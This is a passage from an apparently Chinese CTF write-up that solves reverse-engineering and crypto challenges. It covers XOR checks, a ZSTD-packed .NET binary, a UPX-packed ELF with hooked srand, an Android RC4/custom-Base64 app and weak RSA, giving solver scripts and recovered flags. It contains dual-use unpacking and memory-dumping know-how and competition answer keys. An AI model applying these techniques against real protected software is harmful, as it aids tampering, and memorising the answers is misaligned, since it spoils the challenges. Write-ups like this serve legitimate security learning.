flag<br>    128     GET_ITER                        <br>    130     LOAD_FAST_AND_CLEAR             0: c<br>    132     SWAP                            2<br>    134     BUILD_LIST                      0<br>    136     SWAP                            2<br>    138     FOR_ITER                        10 (to 160)<br>    142     STORE_FAST                      0: c<br>    144     PUSH_NULL                       <br>    146     LOAD_NAME                       7: ord<br>    148     LOAD_FAST                       0: c<br>    150     CALL                            1<br>    158     LIST_APPEND                     2<br>    160     JUMP_BACKWARD                   12 (to 138)<br>    162     END_FOR                         <br>    164     SWAP                            2<br>    166     STORE_FAST                      0: c<br>    168     STORE_NAME                      3: flag<br>    170     LOAD_CONST                      4: <span class="hljs-string">'ADCTF2024'</span><br>    172     STORE_NAME                      8: key<br>    174     PUSH_NULL                       <br>    176     LOAD_NAME                       9: range<br>    178     PUSH_NULL                       <br>    180     LOAD_NAME                       10: len<br>    182     LOAD_NAME                       3: flag<br>    184     CALL                            1<br>    192     CALL                            1<br>    200     GET_ITER                        <br>    202     FOR_ITER                        46 (to 296)<br>    206     STORE_NAME                      11: i<br>    208     LOAD_NAME                       3: flag<br>    210     LOAD_NAME                       11: i<br>    212     COPY                            2<br>    214     COPY                            2<br>    216     BINARY_SUBSCR                   <br>    220     PUSH_NULL                       <br>    222     LOAD_NAME                       7: ord<br>    224     LOAD_NAME                       8: key<br>    226     LOAD_NAME                       11: i<br>    228     PUSH_NULL                       <br>    230     LOAD_NAME                       10: len<br>    232     LOAD_NAME                       8: key<br>    234     CALL                            1<br>    242     BINARY_OP                       6 (%)<br>    246     BINARY_SUBSCR                   <br>    250     CALL                            1<br>    258     BINARY_OP                       25 (^=)<br>    262     SWAP                            3<br>    264     SWAP                            2<br>    266     STORE_SUBSCR                    <br>    270     LOAD_NAME                       3: flag<br>    272     LOAD_NAME                       11: i<br>    274     COPY                            2<br>    276     COPY                            2<br>    278     BINARY_SUBSCR                   <br>    282     LOAD_NAME                       11: i<br>    284     BINARY_OP                       25 (^=)<br>    288     SWAP                            3<br>    290     SWAP                            2<br>    292     STORE_SUBSCR                    <br>    296     JUMP_BACKWARD                   48 (to 202)<br>    298     END_FOR                         <br>    300     LOAD_NAME                       3: flag<br>    302     LOAD_NAME                       1: secret<br>    304     COMPARE_OP                      40 (==)<br>    308     POP_JUMP_IF_FALSE               9 (to 328)<br>    310     PUSH_NULL                       <br>    312     LOAD_NAME                       12: <span class="hljs-built_in">print</span><br>    314     LOAD_CONST                      5: <span class="hljs-string">'Correct!'</span><br>    316     CALL                            1<br>    324     POP_TOP                         <br>    326     RETURN_CONST                    1: None<br>    328     PUSH_NULL                       <br>    330     LOAD_NAME                       12: <span class="hljs-built_in">print</span><br>    332     LOAD_CONST                      6: <span class="hljs-string">'Wrong!'</span><br>    334     CALL                            1<br>    342     POP_TOP                         <br>    344     RETURN_CONST                    1: None<br>    346     SWAP                            2<br>    348     POP_TOP                         <br>    350     SWAP                            2<br>    352     STORE_FAST                      0: c<br>    354     RERAISE                         0<br><br></code></pre></td></tr></tbody></table></figure>
<p>经过分析可以知道程序的加密逻辑并不难，大概过程如下</p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">len</span>(flag)<br>   	flag[i] = flag[i] ^ key[i % <span class="hljs-built_in">len</span>(key)] ^ i<br>   <span class="hljs-comment">#key = "ADCTF2024"</span><br></code></pre></td></tr></tbody></table></figure>
<p>直接给出exp</p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> base64<br><br>secret = [<br>    <span class="hljs-number">27</span>, <span class="hljs-number">40</span>, <span class="hljs-number">57</span>, <span class="hljs-number">63</span>, <span class="hljs-number">24</span>, <span class="hljs-number">4</span>, <span class="hljs-number">66</span>, <span class="hljs-number">4</span>, <span class="hljs-number">100</span>, <span class="hljs-number">122</span>, <span class="hljs-number">8</span>, <span class="hljs-number">27</span>, <span class="hljs-number">21</span>, <span class="hljs-number">122</span>, <span class="hljs-number">4</span>, <span class="hljs-number">15</span>, <span class="hljs-number">122</span>, <span class="hljs-number">20</span>, <span class="hljs-number">17</span>, <span class="hljs-number">98</span>,<br>    <span class="hljs-number">25</span>, <span class="hljs-number">115</span>, <span class="hljs-number">55</span>, <span class="hljs-number">82</span>, <span class="hljs-number">74</span>, <span class="hljs-number">71</span>, <span class="hljs-number">23</span>, <span class="hljs-number">20</span>, <span class="hljs-number">9</span>, <span class="hljs-number">26</span>, <span class="hljs-number">28</span>, <span class="hljs-number">105</span>, <span class="hljs-number">95</span>, <span class="hljs-number">34</span>, <span class="hljs-number">90</span>, <span class="hljs-number">46</span><br>]<br>key = <span class="hljs-string">'ADCTF2024'</span><br>decoded_flag = []<br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(secret)):<br>    decoded_flag.append(secret[i] ^ <span class="hljs-built_in">ord</span>(key[i % <span class="hljs-built_in">len</span>(key)]) ^ i)<br>decoded_flag_str = <span class="hljs-string">''</span>.join(<span class="hljs-built_in">chr</span>(c) <span class="hljs-keyword">for</span> c <span class="hljs-keyword">in</span> decoded_flag)<br>original_flag = base64.b64decode(decoded_flag_str).decode()<br><span class="hljs-built_in">print</span>(original_flag)<br><span class="hljs-comment">#flag{u_aR3_4_Py7h0n_M@5t3r}</span><br></code></pre></td></tr></tbody></table></figure>
<hr>
<h3 id="NotOnlyDotNet">NotOnlyDotNet</h3>
<p>拿到附件用IDA打开，进入main函数没有发现什么明显的加密逻辑，但是调用了ZSTD的api和一些进程之间的调用函数，并且通过ZSTD把两块内存中的数据解压出来了，猜测这两块内存是通过ZSTD压缩过后的数据，所以思路为dump出这两段数据再用ZSTD解压，看看程序的具体逻辑是什么</p>
<p><img src="https://jeremiah.oss-cn-shenzhen.aliyuncs.com/picture/202412182311113.png" alt="image-20241202212137048"></p>
<p><img src="https://jeremiah.oss-cn-shenzhen.aliyuncs.com/picture/202412182311108.png" alt="image-20241202212158468"></p>
<p>dump shell_data 和 core_data有两种方式，第一种是直接动调dump出解压后的数据，第二种方法是用IDApyhton脚本把这两段数据dump成bin文件，再用ZSTD库进行解压得到文件，这里采用第二种方式</p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> idaapi<br><span class="hljs-keyword">import</span> idc<br><span class="hljs-keyword">import</span> ida_bytes<br><br><br>start_address = <span class="hljs-number">0x402010</span>  <span class="hljs-comment"># 起始地址</span><br>size = <span class="hljs-number">0x24AA</span>  <span class="hljs-comment"># 数据大小</span><br><br>output_file = <span class="hljs-string">"core_data.bin"</span><br><br><span class="hljs-comment"># 打开文件准备写入</span><br><span class="hljs-keyword">with</span> <span class="hljs-built_in">open</span>(output_file, <span class="hljs-string">"wb"</span>) <span class="hljs-keyword">as</span> f:<br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(size):<br>        byte = ida_bytes.get_byte(start_address + i)<br>        f.write(<span class="hljs-built_in">bytes</span>([byte]))<br><br></code></pre></td></tr></tbody></table></figure>
<p>根据ida中给出的地址和大小就可以把这两个文件dump出来，然后用ZSTD解压</p>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><code class="hljs bash">C:\Users\HelloCTF_OS\Downloads\NotOnlyDotNet (1)&gt;zstd -d gshell_data.bin -o gshell_data_decompressed<br>gshell_data.bin     : 66818650 bytes<br><br>C:\Users\HelloCTF_OS\Downloads\NotOnlyDotNet (1)&gt;zstd -d core_data.bin -o core_data_decompressed<br>core_data.bin       : 12288 bytes<br></code></pre></td></tr></tbody></table></figure>
<p><img src="https://jeremiah.oss-cn-shenzhen.aliyuncs.com/picture/202412182311095.png" alt="image-20241202212758914"></p>
<p>得到这两个文件，对这两个程序查壳，发现是C#写的elf文件，用ILspy和dnspy进行反编译，ILspy和dnspy好像只能识别exe文件所以改了后缀</p>
<p><img src="https://jeremiah.oss-cn-shenzhen.aliyuncs.com/picture/202412182311402.png" alt="image-20241202213208682"></p>
<p><img src="https://jeremiah.oss-cn-shenzhen.aliyuncs.com/picture/202412182311455.png" alt="image-20241202213259800"></p>
<p>执行流程大概是：AES-&gt;XOR-&gt;Base64，其中AES和XOR用到的key是通过main函数传参过来的，所以key应该是在shell里面，随便翻翻就能找到，这里直接整合到一起了</p>
<p><img src="https://jeremiah.oss-cn-shenzhen.aliyuncs.com/picture/202412182311400.png" alt="image-20241202213603804"></p>
<p>exp如下(太懒了丢给ai了)</p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> Crypto.Cipher <span class="hljs-keyword">import</span> AES<br><span class="hljs-keyword">from</span> Crypto.Util.Padding <span class="hljs-keyword">import</span> unpad<br><span class="hljs-keyword">import</span> base64<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">xor_decrypt</span>(<span class="hljs-params">data, xor_key</span>):<br>    <span class="hljs-string">"""XOR 解密"""</span><br>    <span class="hljs-keyword">return</span> <span class="hljs-built_in">bytes</span>([b ^ xor_key[i % <span class="hljs-built_in">len</span>(xor_key)] <span class="hljs-keyword">for</span> i, b <span class="hljs-keyword">in</span> <span class="hljs-built_in">enumerate</span>(data)])<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">aes_decrypt</span>(<span class="hljs-params">ciphertext, aes_key</span>):<br>    <span class="hljs-string">"""AES 解密"""</span><br>    cipher = AES.new(aes_key, AES.MODE_CBC, aes_key)  <span class="hljs-comment"># 使用 aes_key 作为 IV</span><br>    decrypted = unpad(cipher.decrypt(ciphertext), AES.block_size)<br>    <span class="hljs-keyword">return</span> decrypted<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">main</span>(<span class="hljs-params">aes_key, xor_key, encrypted_data_base64</span>):<br>    <span class="hljs-comment"># Base64 解密</span><br>    encrypted_data = base64.b64decode(encrypted_data_base64)<br><br>    <span class="hljs-comment"># 先进行 XOR 解密</span><br>    xor_decrypted = xor_decrypt(encrypted_data, xor_key)<br><br>    <span class="hljs-comment"># 再进行 AES 解密</span><br>    aes_decrypted = aes_decrypt(xor_decrypted, aes_key)<br><br>    <span class="hljs-comment"># 转换回 UTF-8 字符串</span><br>    decrypted_flag = aes_decrypted.decode(<span class="hljs-string">'utf-8'</span>)<br>    <span class="hljs-keyword">return</span> decrypted_flag<br><br><span class="hljs-comment"># 输入你的 aesKey 和 xorKey，以及已知的 Base64 加密后的数据</span><br>aes_key = <span class="hljs-built_in">bytes</span>([<span class="hljs-number">62</span>, <span class="hljs-number">107</span>, <span class="hljs-number">51</span>, <span class="hljs-number">121</span>, <span class="hljs-number">49</span>, <span class="hljs-number">95</span>, <span class="hljs-number">102</span>, <span class="hljs-number">48</span>, <span class="hljs-number">114</span>, <span class="hljs-number">95</span>, <span class="hljs-number">122</span>, <span class="hljs-number">64</span>, <span class="hljs-number">107</span>, <span class="hljs-number">48</span>, <span class="hljs-number">60</span>, <span class="hljs-number">51</span>])  <span class="hljs-comment"># AES key</span><br>xor_key = <span class="hljs-string">b'z@k0f1ndth3key2w'</span>  <span class="hljs-comment"># XOR key（可以是任意字节数组）</span><br>encrypted_data_base64 = <span class="hljs-string">'qpuQkUPI8knvxgK5U0UwKCrrQeOxdY8H6YKuzcD05OKatSh0UCg8+xDIxsbppDNaY3Eflx0Va8F/7wKxVrI8Qgq0vH4BUGXBDc1fSNUww5Y='</span>  <span class="hljs-comment"># 填入从C#程序中获取到的加密数据的Base64字符串</span><br><br><span class="hljs-comment"># 调用解密函数</span><br>decrypted_flag = main(aes_key, xor_key, encrypted_data_base64)<br><span class="hljs-built_in">print</span>(<span class="hljs-string">f"解密后的 flag: <span class="hljs-subst">{decrypted_flag}</span>"</span>)<br><span class="hljs-comment"># flag{U_r_r33lly_tAl3nted_At_r3ve3s3_aNA1yz1ng!!!_p@ch1!!!nyA!!!}</span><br></code></pre></td></tr></tbody></table></figure>
<hr>
<h3 id="what-why">what!why!!!</h3>
<p>DIE查壳，发现upx壳直接upx -d脱壳</p>
<p><img src="https://jeremiah.oss-cn-shenzhen.aliyuncs.com/picture/202412182311422.png" alt="image-20241202214636135"></p>
<p><img src="https://jeremiah.oss-cn-shenzhen.aliyuncs.com/picture/202412182311492.png" alt="image-20241202233510014"></p>
<p>main函数直接就是加密逻辑，大概就是64字节的数据，每四个为一组进行处理这里v6的值并没有显式给出来，但是看汇编能知道是s的首地址+64，就是s的最后一个字节的地址，尝试写了exp但是结果都不对，奇怪的是前4个字节是flag，但是后面的都不对，猜测程序在第一组字节加密过后对过程进行了修改</p>
<figure class="highlight c"><table><tbody><tr><td class="code"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdio.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdlib.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;time.h&gt;</span></span><br><br><span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">()</span> {<br>	<span class="hljs-type">unsigned</span> <span class="hljs-type">char</span> input[<span class="hljs-number">64</span>] = { <br>    <span class="hljs-number">0x87</span>, <span class="hljs-number">0xE9</span>, <span class="hljs-number">0x72</span>, <span class="hljs-number">0x0E</span>, <span class="hljs-number">0x1F</span>, <span class="hljs-number">0x57</span>, <span class="hljs-number">0xEC</span>, <span class="hljs-number">0x0C</span>, <br>    <span class="hljs-number">0xE9</span>, <span class="hljs-number">0x9C</span>, <span class="hljs-number">0xC0</span>, <span class="hljs-number">0x5E</span>, <span class="hljs-number">0x25</span>, <span class="hljs-number">0x32</span>, <span class="hljs-number">0xCD</span>, <span class="hljs-number">0x1F</span>, <br>    <span class="hljs-number">0xC0</span>, <span class="hljs-number">0x16</span>, <span class="hljs-number">0x31</span>, <span class="hljs-number">0x2B</span>, <span class="hljs-number">0xA5</span>, <span class="hljs-number">0xDC</span>, <span class="hljs-number">0x91</span>, <span class="hljs-number">0x71</span>, <br>    <span class="hljs-number">0xE0</span>, <span class="hljs-number">0x1F</span>, <span class="hljs-number">0xA3</span>, <span class="hljs-number">0x01</span>, <span class="hljs-number">0x6A</span>, <span class="hljs-number">0x1D</span>, <span class="hljs-number">0x6F</span>, <span class="hljs-number">0x55</span>, <br>    <span class="hljs-number">0x77</span>, <span class="hljs-number">0x1B</span>, <span class="hljs-number">0x0E</span>, <span class="hljs-number">0x33</span>, <span class="hljs-number">0xB7</span>, <span class="hljs-number">0xD0</span>, <span class="hljs-number">0xDE</span>, <span class="hljs-number">0x24</span>, <br>    <span class="hljs-number">0x3B</span>, <span class="hljs-number">0xCF</span>, <span class="hljs-number">0xAC</span>, <span class="hljs-number">0x64</span>, <span class="hljs-number">0xE3</span>, <span class="hljs-number">0x80</span>, <span class="hljs-number">0x7B</span>, <span class="hljs-number">0x3B</span>, <br>    <span class="hljs-number">0x62</span>, <span class="hljs-number">0xE4</span>, <span class="hljs-number">0x33</span>, <span class="hljs-number">0x1C</span>, <span class="hljs-number">0xCA</span>, <span class="hljs-number">0xBF</span>, <span class="hljs-number">0xAC</span>, <span class="hljs-number">0x5F</span>, <br>    <span class="hljs-number">0xF0</span>, <span class="hljs-number">0x9F</span>, <span class="hljs-number">0xB1</span>, <span class="hljs-number">0x0E</span>, <span class="hljs-number">0xCE</span>, <span class="hljs-number">0x40</span>, <span class="hljs-number">0xEE</span>, <span class="hljs-number">0x64</span><br>};<br>    <span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> i, j;<br>    <span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> rand_value;<br>	<span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> seed = <span class="hljs-number">0xD000721</span>;<br>    srand(seed);<br>    <span class="hljs-keyword">for</span> (i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">16</span>; i++) {<br>        rand_value = rand();<br>        <span class="hljs-keyword">for</span> (j = <span class="hljs-number">0</span>; j &lt; <span class="hljs-number">4</span>; j++) {<br>            input[<span class="hljs-number">4</span> * i + j] ^= rand_value;<br>			rand_value &gt;&gt;= <span class="hljs-number">8</span>;<br>        }<br>		<br>        seed = rand();<br>        srand(seed);<br>    }<br><br>    <span class="hljs-keyword">for</span> (<span class="hljs-type">int</span> i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">64</span>; i++) {<br>        <span class="hljs-built_in">printf</span>(<span class="hljs-string">"%x"</span>, input[i]);<br>    }<br>    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>}<br></code></pre></td></tr></tbody></table></figure>
<p>这是一开始写的exp，不对，重新对程序分析，在动调的时候发现程序调用sleep(60)的时候会一直处于sleep状态不跳出，应该是对sleep进行了修改，查看sleep的交叉引用</p>
<p><img src="https://jeremiah.oss-cn-shenzhen.aliyuncs.com/picture/202412182311489.png" alt="image-20241202234351240"></p>
<p>发现可疑函数</p>
<p><img src="https://jeremiah.oss-cn-shenzhen.aliyuncs.com/picture/202412182311731.png" alt="image-20241202234612754"></p>
<p>在最下面对sleep函数和srand函数都进行了操作，查看sub_4012C7函数</p>
<p><img src="https://jeremiah.oss-cn-shenzhen.aliyuncs.com/picture/202412182311803.png" alt="image-20241202234705323"></p>
<p>发现调用了两次mprotect函数修改了参数a1的内存读写权限，大概可以猜到就是这里对sleep和srand函数进行了修改，虽然知道了srand函数被修改了，但是不知道传进来的第二个的参数有什么用，然后在汇编里面乱翻翻到了一个未定义的函数(纯运qaq)</p>
<p><img src="https://jeremiah.oss-cn-shenzhen.aliyuncs.com/picture/202412182311921.png" alt="image-20241202235714368"></p>
<p>看汇编能看到熟悉的数字0x0D000721(seed)，可以根据汇编猜测就是当seed!=0x0D000721的时候会执行seed^=0x7A71571,所以main函数的加密过程是不完整的，经过修改的exp如下(请在linux环境下运行)</p>
<figure class="highlight c"><table><tbody><tr><td class="code"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdio.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdlib.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;time.h&gt;</span></span><br><br><span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">()</span> {<br>	<span class="hljs-type">unsigned</span> <span class="hljs-type">char</span> input[<span class="hljs-number">64</span>] = { <br>    <span class="hljs-number">0x87</span>, <span class="hljs-number">0xE9</span>, <span class="hljs-number">0x72</span>, <span class="hljs-number">0x0E</span>, <span class="hljs-number">0x1F</span>, <span class="hljs-number">0x57</span>, <span class="hljs-number">0xEC</span>, <span class="hljs-number">0x0C</span>, <br>    <span class="hljs-number">0xE9</span>, <span class="hljs-number">0x9C</span>, <span class="hljs-number">0xC0</span>, <span class="hljs-number">0x5E</span>, <span class="hljs-number">0x25</span>, <span class="hljs-number">0x32</span>, <span class="hljs-number">0xCD</span>, <span class="hljs-number">0x1F</span>, <br>    <span class="hljs-number">0xC0</span>, <span class="hljs-number">0x16</span>, <span class="hljs-number">0x31</span>, <span class="hljs-number">0x2B</span>, <span class="hljs-number">0xA5</span>, <span class="hljs-number">0xDC</span>, <span class="hljs-number">0x91</span>, <span class="hljs-number">0x71</span>, <br>    <span class="hljs-number">0xE0</span>, <span class="hljs-number">0x1F</span>, <span class="hljs-number">0xA3</span>, <span class="hljs-number">0x01</span>, <span class="hljs-number">0x6A</span>, <span class="hljs-number">0x1D</span>, <span class="hljs-number">0x6F</span>, <span class="hljs-number">0x55</span>, <br>    <span class="hljs-number">0x77</span>, <span class="hljs-number">0x1B</span>, <span class="hljs-number">0x0E</span>, <span class="hljs-number">0x33</span>, <span class="hljs-number">0xB7</span>, <span class="hljs-number">0xD0</span>, <span class="hljs-number">0xDE</span>, <span class="hljs-number">0x24</span>, <br>    <span class="hljs-number">0x3B</span>, <span class="hljs-number">0xCF</span>, <span class="hljs-number">0xAC</span>, <span class="hljs-number">0x64</span>, <span class="hljs-number">0xE3</span>, <span class="hljs-number">0x80</span>, <span class="hljs-number">0x7B</span>, <span class="hljs-number">0x3B</span>, <br>    <span class="hljs-number">0x62</span>, <span class="hljs-number">0xE4</span>, <span class="hljs-number">0x33</span>, <span class="hljs-number">0x1C</span>, <span class="hljs-number">0xCA</span>, <span class="hljs-number">0xBF</span>, <span class="hljs-number">0xAC</span>, <span class="hljs-number">0x5F</span>, <br>    <span class="hljs-number">0xF0</span>, <span class="hljs-number">0x9F</span>, <span class="hljs-number">0xB1</span>, <span class="hljs-number">0x0E</span>, <span class="hljs-number">0xCE</span>, <span class="hljs-number">0x40</span>, <span class="hljs-number">0xEE</span>, <span class="hljs-number">0x64</span><br>};<br>    <span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> i, j;<br>    <span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> rand_value;<br>	<span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> seed = <span class="hljs-number">0xD000721</span>;<br>    srand(seed);<br>    <span class="hljs-keyword">for</span> (i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">16</span>; i++) {<br>        rand_value = rand();<br>        <span class="hljs-keyword">for</span> (j = <span class="hljs-number">0</span>; j &lt; <span class="hljs-number">4</span>; j++) {<br>            input[<span class="hljs-number">4</span> * i + j] ^= rand_value;<br>			rand_value &gt;&gt;= <span class="hljs-number">8</span>;<br>        }<br>        seed = rand();<br>		<span class="hljs-keyword">if</span>(seed != <span class="hljs-number">0xD000721</span>)<br>			seed ^= <span class="hljs-number">0x7A71571</span>;			<span class="hljs-comment">//srand被修改之后的加密逻辑</span><br>        srand(seed);<br>    }<br><br>    <span class="hljs-keyword">for</span> (<span class="hljs-type">int</span> i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">64</span>; i++) {<br>        <span class="hljs-built_in">printf</span>(<span class="hljs-string">"%x"</span>, input[i]);<br>    }<br>    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>}<br><span class="hljs-comment">//flag{kR@z1!!!y0U_3M1nent1y_g0o0od_aT_n0t_b3iNg_r1kr0lled_0rz!!!}</span><br></code></pre></td></tr></tbody></table></figure>
<hr>
<h3 id="Do-you-like-Kotone">Do you like Kotone?</h3>
<p>apk文件，jadx打开，找到mainactivity类</p>
<p><img src="https://jeremiah.oss-cn-shenzhen.aliyuncs.com/picture/202412182311931.png" alt="image-20241203153602991"></p>
<p>对用户输入判断的地方是调用了checker类的checkFlag方法，跟进去看看</p>
<p><img src="https://jeremiah.oss-cn-shenzhen.aliyuncs.com/picture/202412182311985.png" alt="image-20241203153811875"></p>
<p>可以看到在checkflag方法中调用了native层ezandroid.so文件的check方法，解压apk文件找到对应so文件打开</p>
<p><img src="https://jeremiah.oss-cn-shenzhen.aliyuncs.com/picture/202412182311031.png" alt="image-20241203154309024"></p>
<p>so层就是实现了一个标准的rc4加密，这里就不赘述，提取出密文即可，rc4的key在Java层传参的时候就已给出</p>
<p>流程就是base64-&gt;rc4，其中base64进行了换表操作，跟进table变量可以在string.xml文件中找到table的值</p>
<p><strong>89YdTR+PB67i0HaqGJWp4FtcL5Oufle/AVNDS3IxwzCn12mUskZjhrKoyvMXgEbQ</strong></p>
<p><img src="https://jeremiah.oss-cn-shenzhen.aliyuncs.com/picture/202412182311195.png" alt="image-20241203154855526"></p>
<p>尝试解密会失败，回到Java层的base64，根据函数名提示可能base64做了魔改，要重新看base64的逻辑，base64每次去三个字节的数据，最后会出现4个字节的密文，先取第一个字节的低6位并通过查表生成第一个字节的密文，接着取第第二个字节的低4位和一个字节的高2位拼在一起得到第二个字节密文，再取第二个字节高2位和第三个字节低4位组成第三个字节密文，再取第三个字节的低2位和第二个字节的高4位拼成第三个字节密文，最后取第三个字节的高6位组成第四个字节密文，如果明文的字节数不是3的倍数就缺几个字节填几个"="，解密就跟着这个过程逆着写就行</p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><code class="hljs python">data = <span class="hljs-string">"IktLx2oWUJP0aFKck0ocZF+G634e/24Go94OzrP8"</span>   <span class="hljs-comment">#最后一个字节是'='，改成table[0]这样不会影响解码过程</span><br>table = <span class="hljs-string">"89YdTR+PB67i0HaqGJWp4FtcL5Oufle/AVNDS3IxwzCn12mUskZjhrKoyvMXgEbQ"</span><br><br>table_dict = {char: idx <span class="hljs-keyword">for</span> idx, char <span class="hljs-keyword">in</span> <span class="hljs-built_in">enumerate</span>(table)}<br><br>flag = <span class="hljs-string">""</span><br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">0</span>, <span class="hljs-built_in">len</span>(data), <span class="hljs-number">4</span>):<br>    ch1 = table_dict[data[i]]<br>    ch2 = table_dict[data[i+<span class="hljs-number">1</span>]]<br>    ch3 = table_dict[data[i+<span class="hljs-number">2</span>]]<br>    ch4 = table_dict[data[i+<span class="hljs-number">3</span>]]<br><br>    part1 = ch1 | ((ch2 &amp; <span class="hljs-number">3</span>) &lt;&lt; <span class="hljs-number">6</span>)<br>    part2 = ((ch2 &amp; <span class="hljs-number">0x3c</span>) &gt;&gt; <span class="hljs-number">2</span>) | ((ch3 &amp; <span class="hljs-number">0xf</span>) &lt;&lt; <span class="hljs-number">4</span>)<br>    part3 = ((ch3 &amp; <span class="hljs-number">0x30</span>) &gt;&gt; <span class="hljs-number">4</span>) | (ch4 &lt;&lt; <span class="hljs-number">2</span>)<br>    <br>    flag += <span class="hljs-built_in">chr</span>(part1)<br>    flag += <span class="hljs-built_in">chr</span>(part2)<br>    flag += <span class="hljs-built_in">chr</span>(part3)<br><br><span class="hljs-built_in">print</span>(flag)<br><span class="hljs-comment">#flag{Kot0Ne_1s_re@IIy_KAw@ii}</span><br></code></pre></td></tr></tbody></table></figure>
<hr>
<h2 id="Crypto">Crypto</h2>
<h3 id="Too-Close-To-Sqrt">Too_Close_To_Sqrt</h3>
<p>我做出来的密码题都没什么好说的，网上找的脚本</p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> Crypto.Util.number <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">import</span> sympy<br><br><span class="hljs-comment"># n 和 c 的值</span><br>n = <span class="hljs-number">77110253337392483710762885851693115398718726693715564954496625571775664359421696802771127484396119363821442323280817855193791448966346325672454247192244603281463595140923987182065095198239715749980911991399313395478292871386248479783966672279960117003211050451721307589036878362258617072298763845707881171743025954660306653186069633961424298647787491228085801739935823867940079473418881721402983930102278146132444200918211570297746753023639071980907968315022004518691979622641358951345391364430806558132988012728594904676117146959007388204192026655365596585273466096578234688721967922267682066710965927143418418189061</span><br>c = <span class="hljs-number">702169486130185630321527556026041034472676838451810139529487621183247331904842057079283224928768517113408797087181581480998121028501323357655408002432408893862758626561073997320904805861882437888050151254177440453995235705432462544064680391673889537055043464482935772971360736797960328738609078425683870759310570638726605063168459207781397030244493359714270821300687562579988959673816634095712866030123140597773571541522765682883740928146364852979096568241392987132397744676804445290807040450917391600712817423804313823998912230965373385456071776639302417042258135008463458352605827748674554004125037538659993074220</span><br><br><span class="hljs-comment"># 使用 sympy 的 factorint() 来因式分解 n</span><br>factors = sympy.ntheory.factorint(n)<br><br><span class="hljs-comment"># 打印因数，查看哪些是 p 和 q</span><br><span class="hljs-built_in">print</span>(factors)<br><br><span class="hljs-comment"># 获取 p 和 q（在 RSA 中，n = p * q）</span><br><span class="hljs-comment"># 假设 n 只包含两个质因数 p 和 q</span><br>p = <span class="hljs-built_in">list</span>(factors.keys())[<span class="hljs-number">0</span>]<br>q = <span class="hljs-built_in">list</span>(factors.keys())[<span class="hljs-number">1</span>]<br><br><span class="hljs-comment"># 计算 φ(n)</span><br>phi_n = (p - <span class="hljs-number">1</span>) * (q - <span class="hljs-number">1</span>)<br><br><span class="hljs-comment"># 计算 d，d 是 e 的模 φ(n) 逆元</span><br>e = <span class="hljs-number">65537</span><br>d = <span class="hljs-built_in">pow</span>(e, -<span class="hljs-number">1</span>, phi_n)<br><br><span class="hljs-comment"># 解密密文 c</span><br>m = <span class="hljs-built_in">pow</span>(c, d, n)<br><br><span class="hljs-comment"># 将 m 转换为字节并显示</span><br>flag = long_to_bytes(m)<br><span class="hljs-built_in">print</span>(flag.decode())<br><span class="hljs-comment">#flag{oops_the_N_is_not_secure}</span><br><br></code></pre></td></tr></tbody></table></figure>
<h3 id="One-Key-Pad">One_Key_Pad</h3>
<p>逻辑就是flag^key，给出了密文，并且已知前5个字节为flag{ 直接爆破key即可</p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># 爆破和解密脚本</span><br><br><span class="hljs-comment"># 已知的明文前五个字节：'flag{'</span><br>plaintext = [<span class="hljs-built_in">ord</span>(c) <span class="hljs-keyword">for</span> c <span class="hljs-keyword">in</span> <span class="hljs-string">"flag{"</span>]  <span class="hljs-comment"># 转换为字节序列 [102, 108, 97, 103, 123]</span><br><br><span class="hljs-comment"># 密文的前五个字节</span><br>ciphertext = <span class="hljs-built_in">bytes</span>.fromhex(<span class="hljs-string">"e0eae7e1fde3e7fcffd9fee9f4fb"</span>)[:<span class="hljs-number">5</span>]  <span class="hljs-comment"># 提取密文前五个字节</span><br><br><span class="hljs-comment"># 步骤 1: 爆破密钥</span><br>key = []<br><span class="hljs-keyword">for</span> p, c <span class="hljs-keyword">in</span> <span class="hljs-built_in">zip</span>(plaintext, ciphertext):<br>    key.append(p ^ c)<br><br><span class="hljs-comment"># 